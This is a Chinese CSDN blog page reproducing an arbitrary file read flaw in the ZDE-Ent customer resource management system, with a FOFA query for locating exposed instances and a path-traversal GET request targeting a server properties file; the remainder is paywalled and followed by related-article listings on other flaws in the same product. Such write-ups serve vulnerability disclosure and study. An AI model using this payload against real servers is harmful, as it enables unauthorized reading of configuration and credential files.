【漏洞复现】浙大恩特客户资源管理系统 i0004_openFileByStream.jsp 任意文件读取漏洞

最新推荐文章于 2024-10-16 18:37:25 发布

从不学安全

最新推荐文章于 2024-10-16 18:37:25 发布

阅读量260

点赞数 6

分类专栏：漏洞复现文章标签：网络安全

本文链接：https://blog.csdn.net/qq_67810151/article/details/137838959

版权

漏洞复现专栏收录该内容

99 篇文章 33 订阅 ¥9.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了浙大恩特客户资源管理系统中的一个任意文件读取漏洞，详细阐述了漏洞概述、复现过程及影响范围。未授权攻击者能借此读取服务器敏感信息。

摘要由CSDN通过智能技术生成

0x01 产品简介

浙大恩特客户资源管理系统是一款外贸管理软件，它提供了多种功能，包括客户档案管理、邮件管理、OA外贸办公管理系统、分管权限管理、联系跟进及提醒、业务检查管理、统计分析管理等。

0x02 漏洞概述

浙大恩特客户资源管理系统存在任意文件读取漏洞。未授权的攻击者可以通过该漏洞读取服务器任意文件，从而获取大量敏感信息。

0x03 测绘语句

fofa：title="欢迎使用浙大恩特客户资源管理系统"

0x04 漏洞复现

GET /entsoft/module/i0004_openFileByStream.jsp;.jpg?filepath=/../EnterCRM/bin/xy.properties&filename=conan HTTP/1.1

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

从不学安全

关注关注

6
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

浙大恩特客户资源管理系统 Quotegask_editAction SQL注入漏洞复现

0xSec

04-04

274

浙大恩特客户资源管理系统Quotegask_editAction接口存在SQL注入漏洞，攻击者可通过输入恶意SQL代码，突破系统原本设定的访问规则，未经授权访问、修改或删除数据库中的各类敏感信息，包括但不限于员工个人资料、企业核心业务数据等。

【漏洞复现】浙大恩特客户资源管理系统 fileupload.jsp 任意文件上传漏洞

做自己喜欢的事，并将其发挥到极致！

11-15

964

杭州恩软信息技术有限公司(简称浙大恩特)提供外贸管理软件、外贸客户管理软件等外贸软件，是一家专注于外贸客户资源管理及订单管理产品及服务的综合性公司，该系统旨在帮助企业高效管理客户关系，提升销售业绩，促进市场营销和客户服务的优化。系统支持客户数据分析和报表展示，帮助企业深度挖掘客户数据，提供决策参考。

参与评论您还未登录，请先登录后发表或查看评论

浙大恩特客户资源管理系统 SQL注入漏洞（2023年11月发布）

m0_73896875的博客

11-24

714

浙大恩特客户资源管理系统中T0140_editAction.entweb接口处存在SQL注入漏洞，未经身份认证的攻击者可以利用该漏洞获取系统数据库敏感信息，深入利用可获取服务器权限。漏洞等级高危影响版本漏洞类型SQL注入浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源，提升销售和市场营销的效果。

浙大恩特客户资源管理系统 FollowAction SQL注入漏洞复现（含nuclei-POC）_浙大恩特资源管理

m0_62261166的博客

04-16

370

最近遍览了各种网络安全类的文章，内容参差不齐，其中不伐有大佬倾力教学，也有各种不良机构浑水摸鱼，在收到几条私信，发现大家对一套完整的系统的网络安全从学习路线到学习资料，甚至是工具有着不小的需求。该系统旨在帮助企业高效地管理和利用客户资源，提升销售和市场营销的效果。相比起繁琐的文字，还是生动的视频教程更加适合零基础的同学们学习，这里也是整理了一份与上述学习路线一一对应的网络安全视频教程。当然，当你入门之后，仅仅是视频教程已经不能满足你的需求了，你肯定需要学习各种工具的使用以及大量的实战项目，这里也分享一份。

【漏洞复现】浙大恩特客户资源管理系统Ri0004_openFileByStream.jsp接口存在任意文件读取漏洞

失心少年

04-18

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。漏洞链接：http://127.0.0.1/entsoft/module/i0004_openFileByStream.jsp;

浙大恩特客户资源管理系统 i0004_openFileByStream.jsp 任意文件读取漏洞复现

0xSec

04-11

344

浙大恩特客户资源管理系统 i0004_openFileByStream.jsp接口处存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

浙大恩特客户资源管理系统fileupload.jsp,machord_doc.jsp接口任意文件上传漏洞复现 [附POC]

薛定谔嘚喵博客

11-21

358

浙大恩特客户资源管理系统是一款针对企业客户资源管理的软件产品。该系统旨在帮助企业高效地管理和利用客户资源,提升销售和市场营销的效果。该系统fileupload.jsp,machord_doc.jsp等接口允许攻击者向系统上传任意恶意JSP文件，从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。

浙大恩特客户资源管理系统任意文件上传漏洞复现

0xSec

11-10

1658

浙大恩特客户资源管理系统中fileupload.jsp、CustomerAction.entphone、MailAction.entphone、machord_doc.jsp等接口处存在文件上传漏洞，未经身份认证的攻击者可以上传任意后门文件，最终可导致服务器失陷。

浙大恩特客户资源管理系统 crmbasicaction 任意文件上传

败在我手中之敌，从来不会被我视为对手，我给你时间追赶，直至你遥望不见。

01-16

585

浙大恩特客户资源管理系统中的crmbasicaction接口存在安全漏洞，允许攻击者向系统上传任意恶意JSP文件，从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。

[Linux#63][TCP] 常见标志位 | 为什么是三次握手,四次挥手？

2301_80171004的博客

10-10

1119

本文介绍了 TCP 协议中 6 个标志位的作用、三次握手和四次挥手的具体过程，以及 TIME_WAIT 状态的处理方法

如何用3个月零基础入门网络安全？_网络安全零基础怎么学习

2401_84466224的博客

10-15

745

我们知道计算机最早是在西方发明出来的，很多名词或者代码都是英文的，甚至现有的一些教程最初也是英文原版翻译过来的，而且一个漏洞被发现到翻译成中文一般需要一个星期的时间，在这个时间差上漏洞可能都修补了。”答案是否定的，黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖，然后搭建环境，去复现漏洞，去思考学习笔者的挖洞思维，培养自己的渗透思维。

WireShark过滤器

ngczx的博客

10-11

690

Wireshark的过滤器规则可以分为**捕获过滤器**和**显示过滤器**，这两种过滤器有不同的编写规则

Linux系统性能调优技巧详解

运维人生

10-13

582

Linux系统性能调优是一个复杂而持续的过程，需要综合考虑硬件、软件、内核参数、进程管理等多个方面。通过合理的调优措施和持续的监控调整，可以显著提升Linux系统的运行效率和稳定性，为业务提供强有力的支持。性能调优是一个持续的过程，需要不断地监控、分析和调整，以适应不断变化的工作负载和系统环境。希望本文的介绍和代码示例能够帮助您在Linux系统性能调优方面取得更好的效果。

找到占用5601端口的进程ID

m0_46695127的博客

10-13

271

找到占用5601端口的进程ID

天锐绿盾VS Ping32数据安全新选择，用户体验分享

最新发布

weixin_44264342的博客

10-16

320

而Ping32则以其创新的技术和灵活的功能配置，尤其受到技术爱好者和大型企业的青睐。在网络安全的选择上，用户应根据自身的实际需求和技术水平，选择最合适的安全软件，为数字生活提供可靠的保护。相比之下，Ping32虽然功能丰富，但由于其灵活的设置选项，对于一些初学者来说，可能需要一定的时间来熟悉和掌握，同时支持专业的技术团队讲解。尽管如此，Ping32的高级功能能够为有经验的用户提供更高的自定义自由度。在操作便捷性上，天锐绿盾的界面设计简洁直观，用户可以轻松完成各项设置，几乎无需任何技术背景就能顺利使用。

OSI七层协议

hexadecimal_001的博客

10-14

604

OSI（Open System Interconnection）七层协议，即开放式系统互联参考模型，是一个由国际标准化组织（ISO）提出的用于描述计算机网络中通信的结构和功能的理论模型。它将网络通信过程分为七个层次，每个层次都有特定的功能和协议。

网络安全（黑客技术）2024年三个月自学手册

2401_85026116的博客

10-13

996

网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的，技术上面其实有很大的重叠性，抛开甲乙方、岗位名称、岗位职责等因素来看，作为学技术的，也根据以往我们给学员推荐就业和入职情况来看，只要好好掌握以下几种技术（网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言）中的2到3个，都可以较好的胜任工作需求。

H3C Vlan基础配置实验

M建的博客

10-12

315

Vlan基础配置实验

【网络编程】掌握Java网络编程：深入理解Socket通信与实战技巧

Dylaniou的博客

10-11

1049

Java的网络Socket编程为开发者提供了强大的工具来构建网络通信应用，从简单的客户端-服务器模型到复杂的分布式系统。Java的网络Socket编程为开发者提供了强大的工具来构建网络通信应用，从简单的客户端-服务器模型到复杂的分布式系统。希望本文能帮助您掌握Java网络编程的核心技术，并在实际项目中灵活运用。如果您有任何疑问或想要分享经验，请在评论区留下您宝贵的意见！🚀🌐🔌。

浙大恩特外贸客户管理系统操作指南

"浙大恩特外贸客户管理系统使用手册" 浙大恩特外贸客户管理系统是一款专为外贸企业设计的高效管理工具，旨在帮助企业管理客户信息、跟进进度、销售计划以及日常运营。本手册详细介绍了系统的安装、使用和各项功能的...